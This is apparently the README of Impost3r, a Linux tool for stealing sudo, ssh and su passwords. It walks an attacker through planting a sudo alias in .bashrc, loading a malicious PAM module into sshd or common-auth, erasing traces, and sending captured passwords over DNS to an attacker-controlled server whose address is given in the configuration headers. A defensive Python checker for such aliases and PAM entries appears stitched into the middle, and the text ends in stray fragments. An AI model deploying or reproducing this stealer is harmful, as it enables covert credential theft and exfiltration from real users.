Impost3r is a tool written in C that is used to steal various passwords (ssh, su, sudo) under Linux.
Users can use this program to create a watering hole that steals the passwords of legitimate users.
This tool is for security research and teaching only; the user assumes all legal and related responsibility arising from its use! The author assumes no legal or related responsibility!
Automatically erase traces of behavior
Transfer results via DNS protocol
Transparent to the user
gcc
Impost3r can be used to steal the passwords of the sudo, su and ssh services. These three services can roughly be divided into two categories, sudo and ssh/su, and the two cases are discussed separately below.
The sudo case requires only ordinary user permissions, not root. However, it can only steal the password of that user and cannot steal other users' passwords.
First, assume that the attacker controls a server with ordinary user privileges.
Check whether the .bash_profile file exists in the user's home directory. If .bash_profile exists, check whether it actively loads .bashrc. If it does, skip this step and the next two checks and continue with the subsequent operations. If it does not, also skip the next two checks, but replace every operation on .bashrc below with the same operation on .bash_profile. If .bash_profile does not exist, proceed to the next check.
Check whether the .bash_login file exists in the user's home directory. If .bash_login exists, check whether it actively loads .bashrc. If it does, skip this step and the next check and continue with the subsequent operations. If it does not, skip the next check and replace every operation on .bashrc below with the same operation on .bash_login. If .bash_login does not exist, proceed to the next check.
Check whether a .profile file exists in the user's home directory. If .profile exists, check whether it actively loads .bashrc (it does by default). If it does, skip this step and continue with the subsequent operations; if it does not, replace every operation on .bashrc below with the same operation on .profile. If .profile does not exist, Impost3r cannot in principle be used. Depending on the situation, you can still decide to create a .bash_profile or .profile file and write loading code similar to the following into it so that it loads .bashrc:

```sh
if [ -n "$BASH_VERSION" ]; then
    # include .bashrc if it exists
    if [ -f "$HOME/.bashrc" ]; then
        . "$HOME/.bashrc"
    fi
fi
```
Make a copy of the user's .bashrc, for example cp ~/.bashrc /tmp/, and place the copy in a path of the attacker's choosing (in this example the /tmp/ directory; the attacker can change it).
Edit .bashrc (~/.bashrc) in the user's home directory and add the following statement as the last line ("/tmp/.impost3r" must match FILENAME below):

```sh
alias sudo='impost3r() { if [ -f "/tmp/.impost3r" ]; then /tmp/.impost3r "$@" && unalias sudo else unalias sudo;sudo "$@" fi }; impost3r'
```

After adding it, save the file and run source ~/.bashrc
Next, the attacker edits the Impost3r source file /sudo/main.h:

```c
/* Custom setting */
#define FILENAME "/tmp/.impost3r"       /* Location of Impost3r on the target server */
#define BACKUP_ORI_FILENAME ".bashrc"   /* Which original user config file the attacker backed up: .bashrc, .bash_profile, .profile or .bash_login */
#define BACKUP_ORI_PATH "/tmp/.bashrc"  /* Location of that backup on the target server */
#define SAVE_OR_SEND 0                  /* After a successful capture: send the result to the attacker-controlled machine (0) or save it on the target (1); default is send */

/* Send to server */
/* Note: if you do not want to buy a domain to receive Impost3r's messages, and the target server does not
 * block direct UDP connections to port 53 of the DNS server you control, keep the default value here.
 * If the target server strictly restricts outbound DNS requests, set YOUR_DOMAIN to a domain you own,
 * e.g. ".example.com", point that domain's NS record at the DNS server you control, run Fdns on that
 * server, set REMOTE_ADDRESS below to the target server's default DNS address, and set REMOTE_PORT to
 * the DNS port that address listens on (almost always 53). */
#define YOUR_DOMAIN ".com"
#define MAX_RESEND 30                   /* Maximum number of retries when sending a captured password to the attacker's server */
#define RESEND_INTERVAL 5               /* Interval between send attempts */
#define REMOTE_ADDRESS "192.168.0.12"   /* Remote address the password is sent back to */
#define REMOTE_PORT 53                  /* Remote port the password is sent back to */

/* Save to local */
#define SAVE_LOCATION "/tmp/.cache"     /* Where the result file is saved when SAVE_OR_SEND is 1 */
```
After the modification is complete, save and run make in the current directory; the compiled .impost3r file appears in the current directory.
Upload the .impost3r file (preferably compiled on the target server itself to avoid unexpected errors) to the /tmp/ folder of the target server (this is only an example; you can change it as long as it matches the definition in the source code).
The attacker starts the DNS server program on their own server and waits for the legitimate user to use sudo, which yields the password.
When stealing the sudo password, Impost3r erases its traces automatically after success; the attacker does not need to log in and clean up manually.
Impost3r automatically determines whether the password the user entered is correct. It does not end the process and erase its traces until the user has entered the correct password.
Before using Impost3r, run sudo -v to determine whether the current user is in the sudoers group. If not, do not use Impost3r.
Stealing ssh/su passwords differs from the sudo method above: it requires root privileges and can steal any user's password.
The following takes Ubuntu as an example. CentOS is similar, although the files involved and the way they are modified may differ.
First, assume that the attacker controls a server and has obtained root permissions through a privilege escalation (or the lovely administrator started the service as root).
First edit the Impost3r source file /ssh_su/main.h:

```c
/* Custom setting */
#define SSH_OR_BOTH 0                   /* Capture mode: 0 = ssh password only, 1 = ssh and su passwords; default 0 (the difference is explained below) */
#define SAVE_OR_SEND 0                  /* After a successful capture: send the result to the attacker-controlled machine (0) or save it on the target (1); default is send */

/* Send to server */
/* Note: if you do not want to buy a domain to receive Impost3r's messages, and the target server does not
 * block direct UDP connections to port 53 of the DNS server you control, keep the default value here.
 * If the target server strictly restricts outbound DNS requests, set YOUR_DOMAIN to a domain you own,
 * e.g. ".example.com", point that domain's NS record at the DNS server you control, run Fdns on that
 * server, set REMOTE_ADDRESS below to the target server's default DNS address, and set REMOTE_PORT to
 * the DNS port that address listens on (almost always 53). */
#define YOUR_DOMAIN ".com"
#define MAX_RESEND 30                   /* Maximum number of retries when sending a captured password to the attacker's server (only effective when SSH_OR_BOTH is 0) */
#define RESEND_INTERVAL 5               /* Interval between send attempts (only effective when SSH_OR_BOTH is 0) */
#define REMOTE_ADDRESS "192.168.0.12"   /* Remote address the password is sent back to */
#define REMOTE_PORT 53                  /* Remote port the password is sent back to */

/* Save to local */
#define SAVE_LOCATION "/tmp/.sshsucache" /* Where the result file is saved when SAVE_OR_SEND is 1 */
```
After the modification is complete, save and run make in the current directory to obtain the compiled file impost3r.so.
Upload the compiled impost3r.so (preferably compiled on the target server itself to avoid unexpected errors) to /lib/x86_64-linux-gnu/security on the target machine (the folder name may differ between machines; place it according to the situation).
Enter /etc/pam.d. There are two situations here. If the selected mode is to steal only the ssh password, run vi sshd and add the following statements at the end of the file (note that on Linux distributions other than Ubuntu this file may differ considerably from Ubuntu's; it is recommended to read the rules yourself and add the lines in the appropriate place):

```
auth optional impost3r.so
account optional impost3r.so
```

Save and exit, then restart the sshd service: service sshd restart
If you choose to steal the ssh and su passwords together, run vi common-auth instead, add the same statements, save and exit, and restart the sshd service in the same way.
The attacker starts the DNS server program on their own server and waits for a legitimate user to log in to the target machine with ssh or to switch users with su, which yields the password.
When stealing the ssh/su password, Impost3r cannot clear its traces for permission reasons; the attacker has to clear them manually.
Note that if only the ssh password is set to be stolen, the attacker is essentially guaranteed to receive the result, but if both are set to be stolen at the same time, receipt of the result is not guaranteed (this only applies when results are sent over DNS; saving locally is not affected).
Stealing the su password is not recommended. Since a user's ssh password is the same as their su password, if you cannot steal the su password, do not bother: the ssh password is enough.
Empty passwords are not stolen by default. Check whether the user has an empty password (whether PermitEmptyPasswords yes appears in the sshd configuration file); if the password is empty, nothing will be captured.
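As an added defensive example that is not part of Impost3r: a small Python checker for the two persistence points this README relies on, sudo/su being redefined by an alias or function in a shell startup file, and rules in /etc/pam.d that reference a module outside an allowlist. The allowlist, the sample .bashrc and the sample PAM fragment are constructed here; in practice, populate the allowlist from the distribution's package-managed PAM module directory.

```python
import os
import re

# An alias or shell function that redefines sudo/su shadows the real binary.
ALIAS_RE = re.compile(r"^\s*alias\s+(sudo|su)=", re.MULTILINE)
FUNC_RE = re.compile(r"^\s*(?:function\s+)?(sudo|su)\s*\(\)", re.MULTILINE)

def find_command_shadowing(rc_text):
    """Return (kind, command) for every sudo/su alias or function in a startup file."""
    hits = [("alias", m.group(1)) for m in ALIAS_RE.finditer(rc_text)]
    hits += [("function", m.group(1)) for m in FUNC_RE.finditer(rc_text)]
    return hits

def _pam_fields(line):
    """Split a pam.d rule into (type, control, module); bracketed controls may contain spaces."""
    tokens = line.split()
    if len(tokens) < 3:
        return None
    i = 1
    if tokens[1].startswith("["):
        while i < len(tokens) and not tokens[i].endswith("]"):
            i += 1
    control, rest = " ".join(tokens[1:i + 1]), tokens[i + 1:]
    if not rest:
        return None
    return tokens[0].lstrip("-"), control, os.path.basename(rest[0])

def find_unexpected_pam_modules(pam_text, known_modules):
    """Return every rule whose module is not in the allowlist of known modules."""
    unexpected = []
    for raw in pam_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("@include"):
            continue
        fields = _pam_fields(line)
        if fields and fields[2] not in known_modules:
            unexpected.append(fields)
    return unexpected

# Constructed samples (not real files): a .bashrc carrying a sudo alias like the
# one shown above, and an sshd PAM stack with two appended rules.
SAMPLE_BASHRC = "export PATH=$HOME/bin:$PATH\nalias sudo='impost3r() { /tmp/.impost3r \"$@\"; }; impost3r'\n"
SAMPLE_PAM_SSHD = """# constructed /etc/pam.d/sshd fragment
@include common-auth
auth [success=1 default=ignore] pam_unix.so nullok_secure
account required pam_nologin.so
auth optional impost3r.so
account optional impost3r.so
"""
KNOWN_MODULES = {"pam_unix.so", "pam_nologin.so"}  # constructed allowlist
```

Run find_command_shadowing over every file named in the procedure above (.bashrc, .bash_profile, .bash_login, .profile) for each home directory, and find_unexpected_pam_modules over every file in /etc/pam.d.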
I used Fdns as the DNS server program and modified some parameters. You can find the modified source code in the Fdns folder. Compile it yourself with gcc -o dns main.c util.c (note that you must first change the listening port in main.c).
Before compiling Fdns, check the YOUR_DOMAIN value in util.h and make sure it matches the YOUR_DOMAIN value used when compiling the Impost3r program implanted on the server; otherwise the theft may fail.
This program was developed and studied only in my spare time. Its functions may have bugs; please bear with me, and feedback is welcome.
f
libbaseencode